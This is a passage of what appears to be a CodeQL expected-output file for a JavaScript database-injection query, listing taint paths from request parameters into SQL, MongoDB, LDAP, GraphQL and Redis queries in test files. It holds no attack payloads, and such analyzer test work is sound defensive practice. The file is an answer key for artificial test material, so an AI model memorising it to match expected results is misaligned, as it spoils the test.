mongoose.js:115:25:115:45 | cond | mongoose.js:129:21:129:24 | cond | provenance | | -| mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:115:25:115:45 | cond | provenance | | -| mongoose.js:130:23:130:24 | id | mongoose.js:130:16:130:26 | { _id: id } | provenance | Config | -| mongoose.js:133:38:133:42 | query | mongoose.js:136:30:136:34 | query | provenance | | -| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:23:19:23:23 | query | provenance | | -| mongooseJsonParse.js:19:19:19:20 | {} | mongooseJsonParse.js:19:11:19:20 | query | provenance | | -| mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... 
).title | mongooseJsonParse.js:19:11:19:20 | query | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:19:19:20 | {} | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:23:19:23:23 | query | provenance | Config | -| mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | provenance | Config | -| mongooseModelClient.js:10:7:10:32 | v | mongooseModelClient.js:11:22:11:22 | v | provenance | | -| mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | mongooseModelClient.js:10:7:10:32 | v | provenance | | -| mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:10:22:10:31 | req.body.x | provenance | Config | -| mongooseModelClient.js:10:22:10:31 | req.body.x | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | provenance | Config | -| mongooseModelClient.js:11:22:11:22 | v | mongooseModelClient.js:11:16:11:24 | { id: v } | provenance | Config | -| mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:22:12:32 | req.body.id | provenance | Config | -| mongooseModelClient.js:12:22:12:32 | req.body.id | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | provenance | Config | -| mysql.js:6:9:6:31 | temp | mysql.js:15:62:15:65 | temp | provenance | | -| mysql.js:6:9:6:31 | temp | mysql.js:19:70:19:73 | temp | provenance | | -| mysql.js:6:16:6:31 | req.params.value | mysql.js:6:9:6:31 | temp | provenance | | -| mysql.js:15:62:15:65 | temp | mysql.js:15:18:15:65 | 'SELECT ... + temp | provenance | | -| mysql.js:19:70:19:73 | temp | mysql.js:19:26:19:73 | 'SELECT ... 
+ temp | provenance | | -| pg-promise-types.ts:7:9:7:28 | taint | pg-promise-types.ts:8:17:8:21 | taint | provenance | | -| pg-promise-types.ts:7:17:7:28 | req.params.x | pg-promise-types.ts:7:9:7:28 | taint | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:9:10:9:14 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:10:11:10:15 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:11:17:11:21 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:12:10:12:14 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:13:12:13:16 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:14:18:14:22 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:15:11:15:15 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:16:10:16:14 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:17:16:17:20 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:18:12:18:16 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:19:13:19:17 | query | provenance | | -| pg-promise.js:6:7:7:55 | query | pg-promise.js:22:11:22:15 | query | provenance | | -| pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:6:7:7:55 | query | provenance | | -| pg-promise.js:9:10:9:14 | query | pg-promise.js:10:11:10:15 | query | provenance | | -| pg-promise.js:10:11:10:15 | query | pg-promise.js:11:17:11:21 | query | provenance | | -| pg-promise.js:11:17:11:21 | query | pg-promise.js:12:10:12:14 | query | provenance | | -| pg-promise.js:12:10:12:14 | query | pg-promise.js:13:12:13:16 | query | provenance | | -| pg-promise.js:13:12:13:16 | query | pg-promise.js:14:18:14:22 | query | provenance | | -| pg-promise.js:14:18:14:22 | query | pg-promise.js:15:11:15:15 | query | provenance | | -| pg-promise.js:15:11:15:15 | query | pg-promise.js:16:10:16:14 | query | provenance | | -| 
pg-promise.js:16:10:16:14 | query | pg-promise.js:17:16:17:20 | query | provenance | | -| pg-promise.js:17:16:17:20 | query | pg-promise.js:18:12:18:16 | query | provenance | | -| pg-promise.js:18:12:18:16 | query | pg-promise.js:19:13:19:17 | query | provenance | | -| pg-promise.js:19:13:19:17 | query | pg-promise.js:22:11:22:15 | query | provenance | | -| pg-promise.js:22:11:22:15 | query | pg-promise.js:60:20:60:24 | query | provenance | | -| pg-promise.js:22:11:22:15 | query | pg-promise.js:63:23:63:27 | query | provenance | | -| pg-promise.js:22:11:22:15 | query | pg-promise.js:64:16:64:20 | query | provenance | | -| pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | provenance | | -| pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | provenance | | -| pg-promise.js:41:7:41:20 | req.params.foo | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | provenance | | -| redis.js:10:16:10:23 | req.body | redis.js:10:16:10:27 | req.body.key | provenance | Config | -| redis.js:12:9:12:26 | key | redis.js:13:16:13:18 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:18:16:18:18 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:19:43:19:45 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:25:14:25:16 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:26:14:26:16 | key | provenance | | -| redis.js:12:9:12:26 | key | redis.js:32:28:32:30 | key | provenance | | -| redis.js:12:15:12:22 | req.body | redis.js:12:15:12:26 | req.body.key | provenance | Config | -| redis.js:12:15:12:26 | req.body.key | redis.js:12:9:12:26 | key | provenance | | -| redis.js:13:16:13:18 | key | redis.js:18:16:18:18 | key | provenance | | -| redis.js:18:16:18:18 | key | redis.js:19:43:19:45 | key | provenance | | -| redis.js:19:43:19:45 | key | redis.js:25:14:25:16 | key | provenance | | -| redis.js:25:14:25:16 | key | redis.js:26:14:26:16 | key | provenance | | -| 
redis.js:26:14:26:16 | key | redis.js:30:23:30:25 | key | provenance | | -| redis.js:26:14:26:16 | key | redis.js:32:28:32:30 | key | provenance | | -| redis.js:38:11:38:28 | key | redis.js:39:16:39:18 | key | provenance | | -| redis.js:38:11:38:28 | key | redis.js:43:27:43:29 | key | provenance | | -| redis.js:38:11:38:28 | key | redis.js:46:34:46:36 | key | provenance | | -| redis.js:38:17:38:24 | req.body | redis.js:38:17:38:28 | req.body.key | provenance | Config | -| redis.js:38:17:38:28 | req.body.key | redis.js:38:11:38:28 | key | provenance | | -| socketio.js:10:25:10:30 | handle | socketio.js:11:46:11:51 | handle | provenance | | -| socketio.js:11:46:11:51 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | provenance | | -| tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | provenance | | -| tst3.js:7:7:8:55 | query1 | tst3.js:9:14:9:19 | query1 | provenance | | -| tst3.js:8:16:8:34 | req.params.category | tst3.js:7:7:8:55 | query1 | provenance | | -| tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | provenance | | -| tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | provenance | | subpaths -#select -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | -| graphql.js:27:30:27:40 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:27:30:27:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:30:32:30:42 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:30:32:30:42 | `foo ${id}` | This query string depends on a $@. 
| graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:33:18:33:28 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:33:18:33:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:44:14:44:24 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:44:14:44:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:48:44:48:54 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:48:44:48:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:56:39:56:49 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:56:39:56:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:58:66:58:76 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:58:66:58:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | graphql.js:74:14:74:25 | req.query.id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:84:14:90:8 | `{\\n ... }` | graphql.js:74:14:74:25 | req.query.id | graphql.js:84:14:90:8 | `{\\n ... }` | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:120:38:120:48 | `foo ${id}` | graphql.js:119:16:119:28 | req.params.id | graphql.js:120:38:120:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:119:16:119:28 | req.params.id | user-provided value | -| html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... 
param1 | This query string depends on a $@. | html-sanitizer.js:13:39:13:44 | param1 | user-provided value | -| json-schema-validator.js:33:22:33:26 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:33:22:33:26 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | -| json-schema-validator.js:35:18:35:22 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:35:18:35:22 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | -| json-schema-validator.js:55:22:55:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:55:22:55:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | -| json-schema-validator.js:59:22:59:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:59:22:59:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | -| json-schema-validator.js:61:22:61:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:61:22:61:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | -| koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | koarouter.js:5:13:5:19 | version | koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | This query string depends on a $@. | koarouter.js:5:13:5:19 | version | user-provided value | -| ldap.js:28:30:28:34 | opts1 | ldap.js:20:21:20:27 | req.url | ldap.js:28:30:28:34 | opts1 | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| ldap.js:32:5:32:61 | { filte ... e}))` } | ldap.js:20:21:20:27 | req.url | ldap.js:32:5:32:61 | { filte ... 
e}))` } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| ldap.js:66:30:66:53 | { filte ... ilter } | ldap.js:20:21:20:27 | req.url | ldap.js:66:30:66:53 | { filte ... ilter } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| ldap.js:68:27:68:42 | `cn=${username}` | ldap.js:20:21:20:27 | req.url | ldap.js:68:27:68:42 | `cn=${username}` | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| marsdb-flow-to.js:14:17:14:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:14:17:14:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | -| marsdb.js:16:12:16:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:16:12:16:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | -| minimongo.js:18:12:18:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:18:12:18:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | -| mongodb.js:18:16:18:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:18:16:18:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | -| mongodb.js:32:18:32:45 | { title ... itle) } | mongodb.js:26:19:26:26 | req.body | mongodb.js:32:18:32:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:26:19:26:26 | req.body | user-provided value | -| mongodb.js:54:16:54:20 | query | mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | This query object depends on a $@. | mongodb.js:49:19:49:33 | req.query.title | user-provided value | -| mongodb.js:65:12:65:16 | query | mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | This query object depends on a $@. 
| mongodb.js:60:16:60:30 | req.query.title | user-provided value | -| mongodb.js:77:14:77:26 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:77:14:77:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:85:12:85:24 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:85:12:85:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:112:14:112:18 | query | mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | This query object depends on a $@. | mongodb.js:107:17:107:29 | queries.title | user-provided value | -| mongodb_bodySafe.js:29:16:29:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | -| mongoose.js:24:21:24:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:24:21:24:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:27:17:27:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:17:27:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:30:22:30:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:30:22:30:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:33:21:33:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:21:33:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:36:28:36:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:36:28:36:32 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:39:16:39:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:16:39:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:42:19:42:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:42:19:42:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:45:28:45:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:28:45:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:48:28:48:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:48:28:48:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:51:28:51:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:28:51:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:54:22:54:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:22:54:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:57:18:57:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:18:57:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:60:22:60:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:22:60:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:63:21:63:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:21:63:25 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:65:32:65:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:65:32:65:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:67:27:67:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:67:27:67:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:68:8:68:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:8:68:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:71:17:71:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:17:71:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:72:10:72:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:72:10:72:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:73:8:73:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:8:73:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:74:7:74:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:74:7:74:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:75:16:75:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:16:75:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:77:10:77:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:77:10:77:14 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:82:46:82:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:82:46:82:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:83:47:83:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:83:47:83:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:85:46:85:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:85:46:85:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:87:51:87:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:87:51:87:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:89:46:89:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:89:46:89:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:92:46:92:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:92:46:92:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:94:51:94:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:94:51:94:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:96:46:96:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:96:46:96:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:111:14:111:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:111:14:111:18 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:113:31:113:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:113:31:113:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:116:22:116:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:116:22:116:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:117:21:117:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:117:21:117:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:118:21:118:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:118:21:118:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:119:18:119:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:119:18:119:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:120:22:120:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:120:22:120:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:121:16:121:19 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:121:16:121:19 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:122:19:122:22 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:122:19:122:22 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:123:20:123:21 | id | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:123:20:123:21 | id | This query object depends on a $@. 
| mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:124:28:124:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:124:28:124:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:125:28:125:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:125:28:125:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:126:28:126:31 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:126:28:126:31 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:127:18:127:21 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:127:18:127:21 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:128:22:128:25 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:128:22:128:25 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:129:21:129:24 | cond | mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:129:21:129:24 | cond | This query object depends on a $@. | mongoose.js:115:32:115:45 | req.query.cond | user-provided value | -| mongoose.js:130:16:130:26 | { _id: id } | mongoose.js:115:11:115:22 | req.query.id | mongoose.js:130:16:130:26 | { _id: id } | This query object depends on a $@. | mongoose.js:115:11:115:22 | req.query.id | user-provided value | -| mongoose.js:136:30:136:34 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:136:30:136:34 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongooseJsonParse.js:23:19:23:23 | query | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:23:19:23:23 | query | This query object depends on a $@. | mongooseJsonParse.js:20:30:20:43 | req.query.data | user-provided value | -| mongooseModelClient.js:11:16:11:24 | { id: v } | mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:11:16:11:24 | { id: v } | This query object depends on a $@. | mongooseModelClient.js:10:22:10:29 | req.body | user-provided value | -| mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | This query object depends on a $@. | mongooseModelClient.js:12:22:12:29 | req.body | user-provided value | -| mysql.js:15:18:15:65 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:15:18:15:65 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | -| mysql.js:19:26:19:73 | 'SELECT ... + temp | mysql.js:6:16:6:31 | req.params.value | mysql.js:19:26:19:73 | 'SELECT ... + temp | This query string depends on a $@. | mysql.js:6:16:6:31 | req.params.value | user-provided value | -| pg-promise-types.ts:8:17:8:21 | taint | pg-promise-types.ts:7:17:7:28 | req.params.x | pg-promise-types.ts:8:17:8:21 | taint | This query string depends on a $@. | pg-promise-types.ts:7:17:7:28 | req.params.x | user-provided value | -| pg-promise.js:9:10:9:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:9:10:9:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:10:11:10:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:10:11:10:15 | query | This query string depends on a $@. 
| pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:11:17:11:21 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:11:17:11:21 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:12:10:12:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:12:10:12:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:13:12:13:16 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:13:12:13:16 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:14:18:14:22 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:14:18:14:22 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:15:11:15:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:15:11:15:15 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:16:10:16:14 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:16:10:16:14 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:17:16:17:20 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:17:16:17:20 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:18:12:18:16 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:18:12:18:16 | query | This query string depends on a $@. 
| pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:19:13:19:17 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:19:13:19:17 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:22:11:22:15 | query | pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:22:11:22:15 | query | This query string depends on a $@. | pg-promise.js:7:16:7:34 | req.params.category | user-provided value | -| pg-promise.js:30:13:30:25 | req.params.id | pg-promise.js:30:13:30:25 | req.params.id | pg-promise.js:30:13:30:25 | req.params.id | This query string depends on a $@. | pg-promise.js:30:13:30:25 | req.params.id | user-provided value | -| pg-promise.js:34:13:34:25 | req.params.id | pg-promise.js:34:13:34:25 | req.params.id | pg-promise.js:34:13:34:25 | req.params.id | This query string depends on a $@. | pg-promise.js:34:13:34:25 | req.params.id | user-provided value | -| pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | This query string depends on a $@. | pg-promise.js:39:7:39:19 | req.params.id | user-provided value | -| pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | pg-promise.js:40:7:40:21 | req.params.name | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | This query string depends on a $@. | pg-promise.js:40:7:40:21 | req.params.name | user-provided value | -| pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | pg-promise.js:41:7:41:20 | req.params.foo | pg-promise.js:38:13:42:5 | [\\n ... n\\n ] | This query string depends on a $@. | pg-promise.js:41:7:41:20 | req.params.foo | user-provided value | -| pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:39:7:39:19 | req.params.id | pg-promise.js:39:7:39:19 | req.params.id | This query string depends on a $@. 
